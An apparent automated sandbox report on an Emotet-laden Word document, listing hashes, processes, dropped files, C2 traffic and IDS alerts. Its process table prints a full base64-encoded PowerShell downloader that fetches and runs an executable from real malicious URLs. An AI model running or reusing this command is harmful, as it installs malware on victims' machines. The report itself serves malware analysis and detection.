File name: | sample.zip |
Full analysis: | https://app.any.run/tasks/eb5643b7-4ed1-436e-9677-e0780c2e0866 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:30:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | D92688E530DAC1459040EBA2363BA498 |
SHA1: | 8D4C4FE377329AFA8433B5EE13ACA8AE2912204F |
SHA256: | D3CB19509DBA777DB7FD6FC00478774DBBE14F82AAA646B38B5801649BD7F862 |
SSDEEP: | 3072:BET9o3homwl6Y4u8+laAxfe/Ekcjly1M3oOxpsQbnbf:0K3hcZ4u8+laAxlkKU1M3oObsE7 |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | c196949b64c47c46681ca3b1eaf57e49b76f0f867f49b2b2b89544c6bbb17c5f.bin |
---|---|
ZipUncompressedSize: | 253952 |
ZipCompressedSize: | 137551 |
ZipCRC: | 0xda32d12f |
ZipModifyDate: | 2019:10:09 16:30:10 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2292 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
592 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\kmdkkmkgdsd.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3780 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADkAYwA0ADMAMAAwADMANgB4ADcANgA2AD0AJwB4ADgANgAwADIAMwAzADAAMwAwADgAMABiACcAOwAkAGIAMQAxAGMANABiADAANQAwADMAMAAxACAAPQAgACcANgA4ADkAJwA7ACQAYgB4ADAAMgAzADgAMwAzADYAOQAxAD0AJwBiADAANwA3ADkAMAA5ADEAMgAzADQAJwA7ACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAxADEAYwA0AGIAMAA1ADAAMwAwADEAKwAnAC4AZQB4AGUAJwA7ACQAYwA1ADkAYgAwADgANQB4AGIANgA3AHgANQA9ACcAeAA1ADYAYgA4ADgAMABiAHgAMQA0ACcAOwAkAGIAYgB4ADUANwAxADEAMgA5ADkAMAA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAGwAaQBFAE4AdAA7ACQAYgAzADkAOAAwAHgAOQA2ADAAMAAwADIAPQAnAGgAdAB0AHAAcwA6AC8ALwAxAGcAcgBlAGEAdAByAGUAYQBsAGUAcwB0AGEAdABlAHMAYQBsAGUAcwAuAGMAbwBtAC8AdABoAGUAcgBvAGIAaQBuAGgAbwBvAGQAZgBvAHUAbgBkAGEAdABpAG8AbgAvADUAZgAzAHQAbgBfAHQAeQA1AHkAMwBvAC0AMQA1ADAANwA0ADAANgA4ADIALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGUAZAB5AHUAbQBzAHUAbABlAHkAbQBhAG4AcwBpAGsAYQB5AGUAdAAuAGMAbwBtAC8AeQBoAG8AZgBsAGUAcwAvAFUAVQBFAGEAawBjAFYAVwAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwB0AG8AbgBlAHIAZwBpAHIAbABkAGkAYQByAHkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB0ADIAdQBrAGoAMgA4AHQAXwA2AHYAOQA5ADkAOQBlAGYAdgBsAC0AMAAvAEAAaAB0AHQAcABzADoALwAvAGEAYgBjAGMAbwBuAGMAcgBlAHQAZQBpAG4AYwAuAGMAbwBtAC8AZABlAGwAZQB0AGUAXwBhAHMAcwBvAGMALwBmAHUAZQBkAFIAeQB0AHkAeQAvAEAAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAYgBvAHgALgBpAGEAbQByAG8AYgBlAHIAdAB2AC4AYwBvAG0ALwB5AG4AaQBiAGcAawBkADYANQBqAGYALwBTAFQAYQBPAGoAcABmAEcAagAvACcALgAiAFMAUABsAGAAaQBUACIAKAAnAEAAJwApADsAJABjADEAOQA1ADAAMwAwADAANwA1ADAANwA9ACcAYgAzADAANwAyADYANAB4ADAAMAAzACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4ADAAMAA0AGMANQAwADAANgAwADYAIABpAG4AIAAkAGIAMwA5ADgAMAB4ADkANgAwADAAMAAyACkAewB0AHIAeQB7ACQAYgBiAHgANQA3ADEAMQAyADkAOQAwAC4AIgBkAG8AYAB3AGAATgBMAG8AYABBAEQARgBJAGwAZQAiACgAJAB4ADAAMAA0AGMANQAwADAANgAwADYALAAgACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAApADsAJABjADQAOAAwADUAMABiADIAMAAwAGIAPQAnAGIANAA3ADAAOAA1ADQANgAxADkAeAAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMANwA4ADMAMAA5ADcAOAB4AHgAMAAwADgAKQAuACIATABgAEUATgBHAHQAaAAiACAALQBnAGUAIAAzADIANgA2ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAQQBSAHQAIgAoACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAApADsAJABjADAAMwAwAGMAeAB4ADAANgAwADgAPQAnAHgAMAA4ADYAMAA0ADEAYgB4ADQAMABiADAAJwA7AGIAcgBlAGEAawA7ACQAYwA4ADcAMQAzADgAYwA1ADYAMAAwAGMAeAA9ACcAYgAzADEAMAAyADgANwAxAGMAMQAwAGIAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABjADIANwAxAGMAMAAzADQAYgB4ADAAMwA9ACcAYwAxAGMANQBiADAANgAwAGIAYwBjAGMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | "C:\Users\admin\689.exe" | C:\Users\admin\689.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3312 | --c31de7b5 | C:\Users\admin\689.exe | 689.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3032 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 689.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2440 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2292 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2292.16267\c196949b64c47c46681ca3b1eaf57e49b76f0f867f49b2b2b89544c6bbb17c5f.bin | — | |
MD5:— | SHA256:— | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD349.tmp.cvr | — | |
MD5:— | SHA256:— | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\kmdkkmkgdsd.doc.LNK | — | |
MD5:— | SHA256:— | |||
3780 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M371KKIKOOROB32ASLG2.temp | — | |
MD5:— | SHA256:— | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:81042DFE04BBC1E7C6512BE64B3CB7AC | SHA256:653134911244FC5BD0F87FC964D182B164B63606C219AEB2785A4574EC4DC8CC | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D063A7.wmf | wmf | |
MD5:59432DA3A425B1CFC8E5B0E2DE2704B6 | SHA256:1C11365663ED35BF939BFD19E2A8C826FB7FEDDF8F0B80F12D25C2AD64C72EDC | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9103334D.wmf | wmf | |
MD5:37AF23B1C17B442244502E0D958982DF | SHA256:49FB0724215F269191EACF913926DD66B4F489FDF30843A448363A8CF5B1517F | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB98997C.wmf | wmf | |
MD5:280247306980DCCBEE05BDA303A396E8 | SHA256:913002A00A29CCB098E1594DCB3016589E5931E20ED34FE5700B710820D82A70 | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A61F48EA.wmf | wmf | |
MD5:06D4B5E0350C6D98715B48FA7F081EA1 | SHA256:CA7D55836EFBC11F481F4E2E29884414EEE7D085446D9F90841A0CD0C7078AEC | |||
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E224A088.wmf | wmf | |
MD5:6D00203B48FA5E9BD4C0BCDD0A41DED1 | SHA256:7353A7CCD199771D6DE065874191DA96A3CAFE2455C0C2A0B837ABFD7705DF50 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2440 | msptermsizes.exe | POST | — | 23.239.29.211:443 | http://23.239.29.211:443/glitch/ | US | — | — | malicious |
2440 | msptermsizes.exe | POST | — | 198.199.114.69:8080 | http://198.199.114.69:8080/arizona/enable/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3780 | powershell.exe | 160.153.129.231:80 | www.medyumsuleymansikayet.com | GoDaddy.com, LLC | US | malicious |
3780 | powershell.exe | 23.229.205.99:443 | 1greatrealestatesales.com | GoDaddy.com, LLC | US | unknown |
2440 | msptermsizes.exe | 198.199.114.69:8080 | — | Digital Ocean, Inc. | US | malicious |
2440 | msptermsizes.exe | 23.239.29.211:443 | — | Linode, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
1greatrealestatesales.com |
| unknown |
www.medyumsuleymansikayet.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3780 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3780 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3780 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2440 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2440 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2440 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |